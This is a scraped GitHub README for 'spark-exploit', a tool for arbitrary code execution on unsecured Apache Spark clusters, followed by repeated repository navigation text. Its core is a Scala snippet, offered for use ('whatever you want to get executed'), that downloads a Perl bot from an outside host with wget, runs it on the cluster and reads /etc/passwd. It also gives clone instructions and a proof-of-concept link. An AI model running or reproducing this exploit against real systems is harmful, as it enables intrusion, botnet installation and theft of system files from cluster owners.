Arbitary Code Execution in Unsecured Apache Spark Cluster

How to Exploit

Follow the below steps:

* $ git clone https://github.com/akhld/spark-exploit.git
* $ cd spark-exploit

Remote Code Execution

Open exploit.scala, Replace the following code with whatever you want to get executed!

val exploit = sc.parallelize(1 to 1).map(x=>{
           //Replace these with whatever you want to get executed
  	     val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
           val y = "perl bot.pl".!
           scala.io.Source.fromFile("/etc/passwd").mkString
        })

PoC

https://hacked.work/blog/arbitary-code-execution-in-unsecured-apache-spark-cluster/

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
README.md		README.md
build.sbt		build.sbt
exploit.scala		exploit.scala

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Arbitary Code Execution in Unsecured Apache Spark Cluster

How to Exploit

Remote Code Execution

PoC

About

Releases

Packages

Languages

akhld/spark-exploit

Folders and files

Latest commit

History

Repository files navigation

Arbitary Code Execution in Unsecured Apache Spark Cluster

How to Exploit

Remote Code Execution

PoC

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages